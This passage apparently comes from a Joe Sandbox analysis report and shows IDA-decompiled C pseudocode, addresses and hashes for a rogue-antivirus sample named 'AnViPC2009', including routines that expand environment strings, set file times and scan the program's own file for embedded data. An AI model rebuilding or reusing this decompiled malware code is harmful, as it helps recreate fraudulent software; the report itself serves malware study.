                                                                                                                                                  • Opcode ID: 60d81d31fd13ec904b88b616e6f366bdab2b5450025bc41328f9576275823705
                                                                                                                                                  • Instruction ID: dbc64a7e63424debe872fb7989fa0638381befd5781a4931e92fbafa3bedfb83
                                                                                                                                                  • Opcode Fuzzy Hash: 60d81d31fd13ec904b88b616e6f366bdab2b5450025bc41328f9576275823705
                                                                                                                                                  • Instruction Fuzzy Hash: 02D06735044208FECB512F90ED09B997B6AAB18315F10C53AFB09581A1C67A9570DB5A
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                  			E0040B5EC(void* __edi, void* __esi, intOrPtr* _a4, CHAR* _a8, char* _a12, char* _a16, char* _a20) {
                                                                                                                                                  				char _v4100;
                                                                                                                                                  				char* _t29;
                                                                                                                                                  				intOrPtr* _t30;
                                                                                                                                                  				char _t32;
                                                                                                                                                  				char* _t34;
                                                                                                                                                  				char* _t45;
                                                                                                                                                  				char* _t47;
                                                                                                                                                  				void* _t48;
                                                                                                                                                  				void* _t50;
                                                                                                                                                  				void* _t51;
                                                                                                                                                  				CHAR* _t52;
                                                                                                                                                  
                                                                                                                                                  				_t51 = __esi;
                                                                                                                                                  				_t50 = __edi;
                                                                                                                                                  				E00401200(0x1000);
                                                                                                                                                  				_t29 = _a16;
                                                                                                                                                  				_t47 = _a20;
                                                                                                                                                  				if(_t29 != 0) {
                                                                                                                                                  					 *_t29 = 0;
                                                                                                                                                  				}
                                                                                                                                                  				if(_t47 != 0) {
                                                                                                                                                  					 *_t47 = 0;
                                                                                                                                                  				}
                                                                                                                                                  				_t30 = _a4;
                                                                                                                                                  				if(_t30 == 0) {
                                                                                                                                                  					L24:
                                                                                                                                                  					return 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t32 =  *_t30;
                                                                                                                                                  					if(_t32 == 0) {
                                                                                                                                                  						goto L24;
                                                                                                                                                  					}
                                                                                                                                                  					_push(_t51);
                                                                                                                                                  					_t52 = 0;
                                                                                                                                                  					_t48 = 0;
                                                                                                                                                  					do {
                                                                                                                                                  						_a4 = _a4 + 1;
                                                                                                                                                  						if(_t32 != 0x3d) {
                                                                                                                                                  							if(_t32 == 0xd) {
                                                                                                                                                  								_a4 = _a4 + 1;
                                                                                                                                                  								L20:
                                                                                                                                                  								 *_a8 = 0;
                                                                                                                                                  								_t34 = _a12;
                                                                                                                                                  								if(_t34 != 0) {
                                                                                                                                                  									 *_t34 = 0;
                                                                                                                                                  									if(_t52 != 0) {
                                                                                                                                                  										ExpandEnvironmentStringsA(_t52,  &_v4100, 0x1000);
                                                                                                                                                  										_t20 = _t50 - 1; // 0xfff
                                                                                                                                                  										E0040A484(_a12,  &_v4100, _t20);
                                                                                                                                                  										 *((char*)(_a12 + _t50 - 1)) = 0;
                                                                                                                                                  										 *_t52 = 0;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								return _a4;
                                                                                                                                                  							}
                                                                                                                                                  							if(_t32 == 0xa) {
                                                                                                                                                  								goto L20;
                                                                                                                                                  							}
                                                                                                                                                  							L15:
                                                                                                                                                  							_a8 =  &(_a8[1]);
                                                                                                                                                  							 *_a8 = _t32;
                                                                                                                                                  							_t12 = _t50 - 2; // 0xffe
                                                                                                                                                  							if(_t48 > _t12) {
                                                                                                                                                  								 *_a20 = 1;
                                                                                                                                                  								goto L20;
                                                                                                                                                  							}
                                                                                                                                                  							goto L16;
                                                                                                                                                  						}
                                                                                                                                                  						if(_a12 == 0 || _t52 != 0) {
                                                                                                                                                  							goto L15;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t45 = _a16;
                                                                                                                                                  							if(_t45 != 0) {
                                                                                                                                                  								 *_t45 = 1;
                                                                                                                                                  							}
                                                                                                                                                  							_t52 = _a8;
                                                                                                                                                  						}
                                                                                                                                                  						L16:
                                                                                                                                                  						_t32 =  *_a4;
                                                                                                                                                  						_t48 = _t48 + 1;
                                                                                                                                                  					} while (_t32 != 0);
                                                                                                                                                  					goto L20;
                                                                                                                                                  				}
                                                                                                                                                  			}














                                                                                                                                                  0x0040b5ec
                                                                                                                                                  0x0040b5ec
                                                                                                                                                  0x0040b5f4
                                                                                                                                                  0x0040b5f9
                                                                                                                                                  0x0040b5fc
                                                                                                                                                  0x0040b604
                                                                                                                                                  0x0040b606
                                                                                                                                                  0x0040b606
                                                                                                                                                  0x0040b60a
                                                                                                                                                  0x0040b60c
                                                                                                                                                  0x0040b60c
                                                                                                                                                  0x0040b60e
                                                                                                                                                  0x0040b613
                                                                                                                                                  0x0040b6bc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b619
                                                                                                                                                  0x0040b619
                                                                                                                                                  0x0040b61d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b623
                                                                                                                                                  0x0040b624
                                                                                                                                                  0x0040b626
                                                                                                                                                  0x0040b628
                                                                                                                                                  0x0040b628
                                                                                                                                                  0x0040b62d
                                                                                                                                                  0x0040b649
                                                                                                                                                  0x0040b672
                                                                                                                                                  0x0040b675
                                                                                                                                                  0x0040b678
                                                                                                                                                  0x0040b67a
                                                                                                                                                  0x0040b67f
                                                                                                                                                  0x0040b681
                                                                                                                                                  0x0040b685
                                                                                                                                                  0x0040b694
                                                                                                                                                  0x0040b69a
                                                                                                                                                  0x0040b6a8
                                                                                                                                                  0x0040b6b0
                                                                                                                                                  0x0040b6b4
                                                                                                                                                  0x0040b6b4
                                                                                                                                                  0x0040b685
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b6b9
                                                                                                                                                  0x0040b64d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b64f
                                                                                                                                                  0x0040b652
                                                                                                                                                  0x0040b655
                                                                                                                                                  0x0040b657
                                                                                                                                                  0x0040b65c
                                                                                                                                                  0x0040b66d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b66d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b65c
                                                                                                                                                  0x0040b632
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b638
                                                                                                                                                  0x0040b638
                                                                                                                                                  0x0040b63d
                                                                                                                                                  0x0040b63f
                                                                                                                                                  0x0040b63f
                                                                                                                                                  0x0040b642
                                                                                                                                                  0x0040b642
                                                                                                                                                  0x0040b65e
                                                                                                                                                  0x0040b661
                                                                                                                                                  0x0040b663
                                                                                                                                                  0x0040b664
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040b668

                                                                                                                                                  APIs
                                                                                                                                                  • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00001000,?,00000000,?,0040BFAD,00000000,?,?,?,?,?,?,0040D289,?), ref: 0040B694
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EnvironmentExpandStrings
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 237503144-0
                                                                                                                                                  • Opcode ID: 3b4c9f354597fc95f10826ea2e966bededaae85f17ead1938b10c757e2ca349c
                                                                                                                                                  • Instruction ID: 42007130aef083b3b142597f144a87f22f5210554288a476bc14d6e76700480a
                                                                                                                                                  • Opcode Fuzzy Hash: 3b4c9f354597fc95f10826ea2e966bededaae85f17ead1938b10c757e2ca349c
                                                                                                                                                  • Instruction Fuzzy Hash: FC3184351441899FCB12CE58C490AEA7BA5EB16340B04487BF981AB391C73ADD85CBEF
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                  			E0040538C(intOrPtr __ecx, intOrPtr* _a4, signed char _a7, intOrPtr* _a8, signed char _a11, intOrPtr* _a12) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				void* _v24;
                                                                                                                                                  				void* _v32;
                                                                                                                                                  				int _t32;
                                                                                                                                                  				signed char _t40;
                                                                                                                                                  				intOrPtr* _t43;
                                                                                                                                                  				intOrPtr* _t50;
                                                                                                                                                  				intOrPtr* _t53;
                                                                                                                                                  
                                                                                                                                                  				_v8 = __ecx;
                                                                                                                                                  				_t43 = _a4;
                                                                                                                                                  				if(_t43 == 0) {
                                                                                                                                                  					L2:
                                                                                                                                                  					_a7 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_a7 = 1;
                                                                                                                                                  					if( *_t43 == 0) {
                                                                                                                                                  						goto L2;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t50 = _a8;
                                                                                                                                                  				if(_t50 == 0) {
                                                                                                                                                  					L5:
                                                                                                                                                  					_a11 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_a11 = 1;
                                                                                                                                                  					if( *_t50 == 0) {
                                                                                                                                                  						goto L5;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t53 = _a12;
                                                                                                                                                  				if(_t53 == 0 ||  *_t53 == 0) {
                                                                                                                                                  					_t40 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t40 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(_a7 != 0) {
                                                                                                                                                  					E0040DEF5(_t43,  &_v16);
                                                                                                                                                  				}
                                                                                                                                                  				if(_a11 != 0) {
                                                                                                                                                  					E0040DEF5(_t50,  &_v32);
                                                                                                                                                  				}
                                                                                                                                                  				if(_t40 != 0) {
                                                                                                                                                  					E0040DEF5(_t53,  &_v24);
                                                                                                                                                  				}
                                                                                                                                                  				asm("sbb eax, eax");
                                                                                                                                                  				asm("sbb eax, eax");
                                                                                                                                                  				asm("sbb eax, eax");
                                                                                                                                                  				_t32 = SetFileTime( *(_v8 + 4),  ~(_a11 & 0x000000ff) &  &_v32,  ~(_t40 & 0x000000ff) &  &_v24,  ~(_a7 & 0x000000ff) &  &_v16); // executed
                                                                                                                                                  				return _t32;
                                                                                                                                                  			}












                                                                                                                                                  0x00405392
                                                                                                                                                  0x00405395
                                                                                                                                                  0x0040539c
                                                                                                                                                  0x004053a6
                                                                                                                                                  0x004053a6
                                                                                                                                                  0x0040539e
                                                                                                                                                  0x0040539e
                                                                                                                                                  0x004053a4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004053a4
                                                                                                                                                  0x004053ac
                                                                                                                                                  0x004053b1
                                                                                                                                                  0x004053bb
                                                                                                                                                  0x004053bb
                                                                                                                                                  0x004053b3
                                                                                                                                                  0x004053b3
                                                                                                                                                  0x004053b9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004053b9
                                                                                                                                                  0x004053be
                                                                                                                                                  0x004053c3
                                                                                                                                                  0x004053cd
                                                                                                                                                  0x004053c9
                                                                                                                                                  0x004053c9
                                                                                                                                                  0x004053c9
                                                                                                                                                  0x004053d2
                                                                                                                                                  0x004053d8
                                                                                                                                                  0x004053d8
                                                                                                                                                  0x004053e1
                                                                                                                                                  0x004053e9
                                                                                                                                                  0x004053e9
                                                                                                                                                  0x004053f0
                                                                                                                                                  0x004053f8
                                                                                                                                                  0x004053f8
                                                                                                                                                  0x00405403
                                                                                                                                                  0x00405410
                                                                                                                                                  0x0040541e
                                                                                                                                                  0x0040542c
                                                                                                                                                  0x00405436

                                                                                                                                                  APIs
                                                                                                                                                  • SetFileTime.KERNELBASE(?,00000000,00000000,00000000,?,?,?), ref: 0040542C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileTime
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1425588814-0
                                                                                                                                                  • Opcode ID: 146c50b964cf072828e2af265b986e6c12e225fe6d7a5bc8241dca6fabbbd739
                                                                                                                                                  • Instruction ID: 000ebc01fd1d1047a7549c74fa2459a786f80f89ab415a8170d0cde1621a3e6d
                                                                                                                                                  • Opcode Fuzzy Hash: 146c50b964cf072828e2af265b986e6c12e225fe6d7a5bc8241dca6fabbbd739
                                                                                                                                                  • Instruction Fuzzy Hash: 69219232501549EECF15CFB8C441AFF7BA89B25380B08807BE855EB2C1E678DA54DB69
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                  			E00409265(signed int __eax, intOrPtr* __ecx, void* __edx, void* __esi) {
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				signed int _t63;
                                                                                                                                                  				void* _t65;
                                                                                                                                                  				CHAR* _t66;
                                                                                                                                                  				void* _t70;
                                                                                                                                                  				intOrPtr _t75;
                                                                                                                                                  				void* _t76;
                                                                                                                                                  				intOrPtr _t77;
                                                                                                                                                  				intOrPtr _t79;
                                                                                                                                                  				intOrPtr _t80;
                                                                                                                                                  				intOrPtr _t82;
                                                                                                                                                  				char _t95;
                                                                                                                                                  				intOrPtr _t104;
                                                                                                                                                  				void* _t110;
                                                                                                                                                  				char _t111;
                                                                                                                                                  				void* _t116;
                                                                                                                                                  				void* _t117;
                                                                                                                                                  				void* _t118;
                                                                                                                                                  				void* _t119;
                                                                                                                                                  				void* _t122;
                                                                                                                                                  				intOrPtr* _t125;
                                                                                                                                                  				signed int _t127;
                                                                                                                                                  
                                                                                                                                                  				_t110 = __edx;
                                                                                                                                                  				_t97 = __ecx;
                                                                                                                                                  				_t63 = __eax ^ _t127;
                                                                                                                                                  				if(_t63 >= 0) {
                                                                                                                                                  					 *((intOrPtr*)(__esi + 0x6a))();
                                                                                                                                                  					_push( *(_t127 + 8));
                                                                                                                                                  					_t125 = __ecx;
                                                                                                                                                  					_t65 = E0040A386();
                                                                                                                                                  					_t66 = _t127 - 0x40c;
                                                                                                                                                  					if(_t65 != 0) {
                                                                                                                                                  						L5:
                                                                                                                                                  						E0040A450(_t66,  *(_t127 + 8));
                                                                                                                                                  						E00404E8A(_t127 - 0x102c);
                                                                                                                                                  						_t70 = E0040505E(_t127 - 0x102c, _t127 - 0x40c, 0, 1, 0); // executed
                                                                                                                                                  						if(_t70 != 0) {
                                                                                                                                                  							 *(_t127 + 8) =  *(_t127 + 8) | 0xffffffff;
                                                                                                                                                  							 *((intOrPtr*)(_t127 - 4)) = 0;
                                                                                                                                                  							_push(_t95);
                                                                                                                                                  							L8:
                                                                                                                                                  							while( *(_t127 + 8) == 0xffffffff) {
                                                                                                                                                  								_t80 = E00404FA3(_t127 - 0x102c, _t110); // executed
                                                                                                                                                  								 *((intOrPtr*)(_t127 - 8)) = _t80;
                                                                                                                                                  								_t82 = E00405651(_t127 - 0x102c, _t110, _t127 - 0x302c, 0x2000); // executed
                                                                                                                                                  								 *((intOrPtr*)(_t127 - 0xc)) = _t82;
                                                                                                                                                  								if(_t82 >= 0x10) {
                                                                                                                                                  									_t122 = 0;
                                                                                                                                                  									while(1) {
                                                                                                                                                  										_t95 = _t127 + _t122 - 0x302c;
                                                                                                                                                  										if( *_t95 == 0x2a &&  *((char*)(_t127 + _t122 - 0x302b)) == 0x2a && E0040A516(_t127 + _t122 - 0x302a, "*messages***", 0xb) == 0) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										if( *_t95 != 0x52 ||  *((char*)(_t127 + _t122 - 0x302b)) != 0x61 || E0040A516(_t127 + _t122 - 0x302a, 0x412580, 4) != 0) {
                                                                                                                                                  											_t122 = _t122 + 1;
                                                                                                                                                  											if(_t122 <=  *((intOrPtr*)(_t127 - 0xc)) + 0xfffffff0) {
                                                                                                                                                  												continue;
                                                                                                                                                  											} else {
                                                                                                                                                  												L20:
                                                                                                                                                  												E004054B4(_t127 - 0x102c,  *((intOrPtr*)(_t127 - 0xc)) +  *((intOrPtr*)(_t127 - 8)) - 0x10, 0, 0);
                                                                                                                                                  												 *((intOrPtr*)(_t127 - 4)) =  *((intOrPtr*)(_t127 - 4)) + 1;
                                                                                                                                                  												if( *((intOrPtr*)(_t127 - 4)) < 0x40) {
                                                                                                                                                  													goto L8;
                                                                                                                                                  												} else {
                                                                                                                                                  													if( *(_t127 + 8) != 0xffffffff) {
                                                                                                                                                  														goto L22;
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										goto L43;
                                                                                                                                                  									}
                                                                                                                                                  									 *(_t127 + 8) = _t122 +  *((intOrPtr*)(_t127 - 8));
                                                                                                                                                  									goto L20;
                                                                                                                                                  								}
                                                                                                                                                  								L43:
                                                                                                                                                  								_t76 = E0040503B(_t95, _t127 - 0x102c);
                                                                                                                                                  								goto L44;
                                                                                                                                                  							}
                                                                                                                                                  							L22:
                                                                                                                                                  							asm("cdq");
                                                                                                                                                  							_t95 = 0;
                                                                                                                                                  							 *((intOrPtr*)(_t125 + 4)) = 0x20000;
                                                                                                                                                  							E004054B4(_t127 - 0x102c,  *(_t127 + 8), _t110, 0);
                                                                                                                                                  							_t75 = E0040A1C5( *((intOrPtr*)(_t125 + 4)) + 0x400);
                                                                                                                                                  							 *_t125 = _t75;
                                                                                                                                                  							if(_t75 != 0) {
                                                                                                                                                  								 *((char*)(_t75 +  *((intOrPtr*)(_t125 + 4)))) = 0;
                                                                                                                                                  								_t77 = E00405651(_t127 - 0x102c, _t110,  *_t125,  *((intOrPtr*)(_t125 + 4)));
                                                                                                                                                  								_t104 = 0;
                                                                                                                                                  								 *((intOrPtr*)(_t125 + 4)) = _t77;
                                                                                                                                                  								if(_t77 > 0) {
                                                                                                                                                  									while(1) {
                                                                                                                                                  										_t79 =  *_t125;
                                                                                                                                                  										_t111 =  *((char*)(_t79 + _t95));
                                                                                                                                                  										_t95 = _t95 + 1;
                                                                                                                                                  										if(_t111 == 0) {
                                                                                                                                                  											goto L42;
                                                                                                                                                  										}
                                                                                                                                                  										if(_t111 != 0x5c) {
                                                                                                                                                  											if(_t111 == 0xd || _t111 == 0xa) {
                                                                                                                                                  												_t111 = 0xc;
                                                                                                                                                  											}
                                                                                                                                                  											goto L40;
                                                                                                                                                  										} else {
                                                                                                                                                  											_t116 =  *((char*)(_t79 + _t95)) - 0x22;
                                                                                                                                                  											if(_t116 == 0) {
                                                                                                                                                  												 *((char*)(_t79 + _t104)) = 0x22;
                                                                                                                                                  												goto L36;
                                                                                                                                                  											} else {
                                                                                                                                                  												_t117 = _t116 - 0x3a;
                                                                                                                                                  												if(_t117 == 0) {
                                                                                                                                                  													 *((char*)(_t79 + _t104)) = 0x5c;
                                                                                                                                                  													goto L36;
                                                                                                                                                  												} else {
                                                                                                                                                  													_t118 = _t117 - 0x12;
                                                                                                                                                  													if(_t118 == 0) {
                                                                                                                                                  														 *((char*)(_t79 + _t104)) = 0xa;
                                                                                                                                                  														goto L36;
                                                                                                                                                  													} else {
                                                                                                                                                  														_t119 = _t118 - 4;
                                                                                                                                                  														if(_t119 == 0) {
                                                                                                                                                  															 *((char*)(_t79 + _t104)) = 0xd;
                                                                                                                                                  															goto L36;
                                                                                                                                                  														} else {
                                                                                                                                                  															if(_t119 != 0) {
                                                                                                                                                  																L40:
                                                                                                                                                  																 *((char*)(_t79 + _t104)) = _t111;
                                                                                                                                                  															} else {
                                                                                                                                                  																 *((char*)(_t79 + _t104)) = 9;
                                                                                                                                                  																L36:
                                                                                                                                                  																_t95 = _t95 + 1;
                                                                                                                                                  															}
                                                                                                                                                  														}
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										_t104 = _t104 + 1;
                                                                                                                                                  										if(_t95 <  *((intOrPtr*)(_t125 + 4))) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L42;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								L42:
                                                                                                                                                  								 *((char*)(_t104 +  *_t125)) = 0;
                                                                                                                                                  								 *((intOrPtr*)(_t125 + 4)) = _t104;
                                                                                                                                                  							}
                                                                                                                                                  							goto L43;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t76 = E0040503B(_t95, _t127 - 0x102c);
                                                                                                                                                  						}
                                                                                                                                                  						L44:
                                                                                                                                                  					} else {
                                                                                                                                                  						GetModuleFileNameA(0, _t66, 0x400);
                                                                                                                                                  						_t76 = E0040A3B2(_t97, _t127 - 0x40c, 0x5c);
                                                                                                                                                  						if(_t76 != 0) {
                                                                                                                                                  							_t66 = _t76 + 1;
                                                                                                                                                  							goto L5;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					return _t76;
                                                                                                                                                  				} else {
                                                                                                                                                  					 *_t63 =  *_t63 + _t63;
                                                                                                                                                  					return _t63;
                                                                                                                                                  				}
                                                                                                                                                  			}

























                                                                                                                                                  0x00409265
                                                                                                                                                  0x00409265
                                                                                                                                                  0x00409265
                                                                                                                                                  0x00409267
                                                                                                                                                  0x00409278
                                                                                                                                                  0x0040927c
                                                                                                                                                  0x0040927f
                                                                                                                                                  0x00409281
                                                                                                                                                  0x00409288
                                                                                                                                                  0x0040928e
                                                                                                                                                  0x004092b5
                                                                                                                                                  0x004092b9
                                                                                                                                                  0x004092c5
                                                                                                                                                  0x004092dd
                                                                                                                                                  0x004092e4
                                                                                                                                                  0x004092f6
                                                                                                                                                  0x004092fa
                                                                                                                                                  0x004092fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004092fe
                                                                                                                                                  0x0040930e
                                                                                                                                                  0x00409313
                                                                                                                                                  0x00409328
                                                                                                                                                  0x0040932d
                                                                                                                                                  0x00409333
                                                                                                                                                  0x00409339
                                                                                                                                                  0x0040933b
                                                                                                                                                  0x0040933b
                                                                                                                                                  0x00409345
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040936c
                                                                                                                                                  0x00409397
                                                                                                                                                  0x0040939d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040939f
                                                                                                                                                  0x004093a9
                                                                                                                                                  0x004093be
                                                                                                                                                  0x004093c3
                                                                                                                                                  0x004093ca
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004093d0
                                                                                                                                                  0x004093d4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004093d4
                                                                                                                                                  0x004093ca
                                                                                                                                                  0x0040939d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040936c
                                                                                                                                                  0x004093a6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004093a6
                                                                                                                                                  0x00409496
                                                                                                                                                  0x0040949c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004094a1
                                                                                                                                                  0x004093da
                                                                                                                                                  0x004093dd
                                                                                                                                                  0x004093de
                                                                                                                                                  0x004093e9
                                                                                                                                                  0x004093f0
                                                                                                                                                  0x004093fe
                                                                                                                                                  0x00409403
                                                                                                                                                  0x00409407
                                                                                                                                                  0x00409410
                                                                                                                                                  0x0040941e
                                                                                                                                                  0x00409423
                                                                                                                                                  0x00409427
                                                                                                                                                  0x0040942a
                                                                                                                                                  0x0040942c
                                                                                                                                                  0x0040942c
                                                                                                                                                  0x0040942e
                                                                                                                                                  0x00409432
                                                                                                                                                  0x00409435
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040943a
                                                                                                                                                  0x0040947a
                                                                                                                                                  0x00409483
                                                                                                                                                  0x00409483
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040943c
                                                                                                                                                  0x00409440
                                                                                                                                                  0x00409443
                                                                                                                                                  0x00409470
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409445
                                                                                                                                                  0x00409445
                                                                                                                                                  0x00409448
                                                                                                                                                  0x0040946a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040944a
                                                                                                                                                  0x0040944a
                                                                                                                                                  0x0040944d
                                                                                                                                                  0x00409464
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040944f
                                                                                                                                                  0x0040944f
                                                                                                                                                  0x00409452
                                                                                                                                                  0x0040945e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409454
                                                                                                                                                  0x00409456
                                                                                                                                                  0x00409484
                                                                                                                                                  0x00409484
                                                                                                                                                  0x00409458
                                                                                                                                                  0x00409458
                                                                                                                                                  0x00409474
                                                                                                                                                  0x00409474
                                                                                                                                                  0x00409474
                                                                                                                                                  0x00409456
                                                                                                                                                  0x00409452
                                                                                                                                                  0x0040944d
                                                                                                                                                  0x00409448
                                                                                                                                                  0x00409443
                                                                                                                                                  0x00409487
                                                                                                                                                  0x0040948b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040948b
                                                                                                                                                  0x0040942c
                                                                                                                                                  0x0040948d
                                                                                                                                                  0x0040948f
                                                                                                                                                  0x00409493
                                                                                                                                                  0x00409493
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004092e6
                                                                                                                                                  0x004092ec
                                                                                                                                                  0x004092ec
                                                                                                                                                  0x004094a2
                                                                                                                                                  0x00409290
                                                                                                                                                  0x00409298
                                                                                                                                                  0x004092a7
                                                                                                                                                  0x004092ae
                                                                                                                                                  0x004092b4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004092b4
                                                                                                                                                  0x004092ae
                                                                                                                                                  0x004094a5
                                                                                                                                                  0x00409269
                                                                                                                                                  0x00409269
                                                                                                                                                  0x0040926b
                                                                                                                                                  0x0040926b

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000400,?,0000005C,00414C88,?,004098C5,?,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe,0040D489,C:\Users\user\Desktop\Endermanch@AnViPC2009.exe), ref: 00409298
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 514040917-0
                                                                                                                                                  • Opcode ID: 800b57ff41e805e7445b3dab751615107b614ecf42a5428cb65f6f673774a40b
                                                                                                                                                  • Instruction ID: 1dd8b412e6f1353a2516ce6a751c9eb078f520cbb25ae75f9212370612d0c546
                                                                                                                                                  • Opcode Fuzzy Hash: 800b57ff41e805e7445b3dab751615107b614ecf42a5428cb65f6f673774a40b
                                                                                                                                                  • Instruction Fuzzy Hash: B401D4B6500204A9DF20AB32DC45EEF3778DB91354F0085BBFB06B50C1DA789E49C969
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00406007(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                  				void* _t12;
                                                                                                                                                  				intOrPtr _t19;
                                                                                                                                                  
                                                                                                                                                  				_t19 = _a12;
                                                                                                                                                  				 *((char*)(_t19 + 0x109c)) = 0;
                                                                                                                                                  				if(E00407252(__ecx, _a4, _a8) == 0) {
